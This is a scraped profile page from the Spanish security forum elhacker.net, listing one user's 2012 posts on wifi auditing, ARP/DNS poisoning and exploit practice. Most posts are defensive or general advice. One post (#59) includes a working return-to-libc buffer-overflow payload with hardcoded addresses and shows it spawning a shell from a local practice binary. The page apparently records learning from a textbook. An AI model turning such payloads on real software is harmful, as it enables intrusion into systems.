O con una granja de servidores, o con mucha suerte con un diccionario.
Saludos
Saludos
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#52
Hacking Wireless / Re: [Problema]Al poner la essid en aireplay no autentifico
3 Marzo 2012, 18:18 PMCitarnunca veo a ningun conectado solo a uno
En fin...
No sé por qué me da que tu tarjeta va a ser una intel, y que te está fallando por tirar el ataque con mon0. Una manera más simple de simular estas cosas puede ser conectarte a la red con iwconfig, lo que pasa que a veces te va a sacar tu propia clave...
Te cierro el post porque incumple las normas.
Saludos
#53
Hacking Wireless / Re: Me ayudais con una investigacion? un par de dudas que tengo
21 Febrero 2012, 22:22 PM
Que cree el ladrón, que todos son de su condición.
Saludos
Saludos
#54
Hacking Wireless / Re: Ordenadores conectados a mi wifi?
18 Febrero 2012, 12:37 PM
O si quieres algo más profesional, usa nmap, pero desde luego lo más fiable y lo que nunca engaá es la tabla del router.
Saludos
Saludos
#55
Hacking Wireless / Re: arp dns envenenado, a que se debe?
18 Febrero 2012, 00:24 AM
Quiere decir que si no tienes cuidado, puede suplantarte cualquier página web y que tú creas que sea la verdadera de manera que te capture la password.
También para envenenarte la dns tiene que estarte haciendo un arp poison, por lo tanto está sniffando tu tráfico, con lo que si envías cosas sin SSL, puede ver directamente tus cookies y suplantarte en las páginas.
De todas maneras, siempre puede ser un falso positivo. Cuando te salga esos positivos, entra al router y mira si solo tú estás conectado a él, o mira tu tabla de arp para ver si sigues teniendo la misma mac de siempre en el router.
Saludos
También para envenenarte la dns tiene que estarte haciendo un arp poison, por lo tanto está sniffando tu tráfico, con lo que si envías cosas sin SSL, puede ver directamente tus cookies y suplantarte en las páginas.
De todas maneras, siempre puede ser un falso positivo. Cuando te salga esos positivos, entra al router y mira si solo tú estás conectado a él, o mira tu tabla de arp para ver si sigues teniendo la misma mac de siempre en el router.
Saludos
#56
Bugs y Exploits / Re: ¿Se puede agotar la transferencia mensual de un sitio así?
17 Febrero 2012, 21:00 PM
Opino que si eres capaz de hacer que el navegador no use la caché, sí.
Saludos
Saludos
#57
Wireless en Linux / Re: Ruta del diccionario para Bactrack en un pen-drive
15 Febrero 2012, 23:18 PM
Si no montas el disco y linux no está configurado para que los monte por tí al arrancar o al detectarlos, no podrás acceder a ninguna partición de ningún disco duro.
Para eso infórmate sobre los usos del comando mount.
También si lo tienes instalado en un modo no live, puedes tocar el /etc/fstab
Saludos
Para eso infórmate sobre los usos del comando mount.
También si lo tienes instalado en un modo no live, puedes tocar el /etc/fstab
Saludos
#58
Hacking Wireless / Re: arp dns envenenado, a que se debe?
15 Febrero 2012, 23:16 PM
Revisa tu wireless que no tengas a nadie conectado y cambia de inmediato la contraseña a una WPA y si ya la tienes, cambia tu contraseña...
Puede que sea un falso positivo del antivirus, pero quiere decir que te están direccionando a dónde quieren con los dns...
Saludos
Puede que sea un falso positivo del antivirus, pero quiere decir que te están direccionando a dónde quieren con los dns...
Saludos
#59
Bugs y Exploits / Re: Esta vez duda usando libc
13 Febrero 2012, 23:00 PM
Dios Ivanchuk!
Lo logré!!!!
Muchísimas gracias.
Ya te marearé a partir de ahora con los format Strings
Saludos!
PD:Lo que sigo sin entender son los 200 espacios de después del /bin/sh
Lo logré!!!!
Código [Seleccionar]
pianista@pianista-desktop:~ $ BUF=`perl -e 'print " " x 200 . "/bin/sh;" . "A" x 516 . "\x80\x0d\xed\xb7" . "\xf0\x68\xec\xb7" . "\xbe\xc7\xfb\xb7"'`
pianista@pianista-desktop:~ $ ./victim $BUF
sh-3.2$Muchísimas gracias.
Ya te marearé a partir de ahora con los format Strings
Saludos!
PD:Lo que sigo sin entender son los 200 espacios de después del /bin/sh
#60
Bugs y Exploits / Re: Esta vez duda usando libc
12 Febrero 2012, 22:04 PM
Ahhh ok.
Una duda, y entonces porque en ret2libc no lo están pasando???
(Bueno también menuda pregunta voy a hacer si ni tú ni yo hemos implementado eso xD)
El ret2libc lo corregí respecto al libro según indicaba aquí (era obvio que faltaba eso):
http://shellcoders.blogspot.com/2010/08/chapter-2-using-exploit-pp-31-38.html
Ahh y el uso de memfetch:
http://shellcoders.blogspot.com/2009/05/using-memfetch-page-37.html
Saludos y gracias por tu ayuda Ivanchuk, la verdad es que la idea de volver por ret2libc conceptualmente la tengo asimilada, el problema era que quería probarla, pero vamos me está dando tanto la lata, que lo mismo me paso ya a experimentar con los juegos con los format string
Una duda, y entonces porque en ret2libc no lo están pasando???
(Bueno también menuda pregunta voy a hacer si ni tú ni yo hemos implementado eso xD)
El ret2libc lo corregí respecto al libro según indicaba aquí (era obvio que faltaba eso):
http://shellcoders.blogspot.com/2010/08/chapter-2-using-exploit-pp-31-38.html
Ahh y el uso de memfetch:
http://shellcoders.blogspot.com/2009/05/using-memfetch-page-37.html
Saludos y gracias por tu ayuda Ivanchuk, la verdad es que la idea de volver por ret2libc conceptualmente la tengo asimilada, el problema era que quería probarla, pero vamos me está dando tanto la lata, que lo mismo me paso ya a experimentar con los juegos con los format string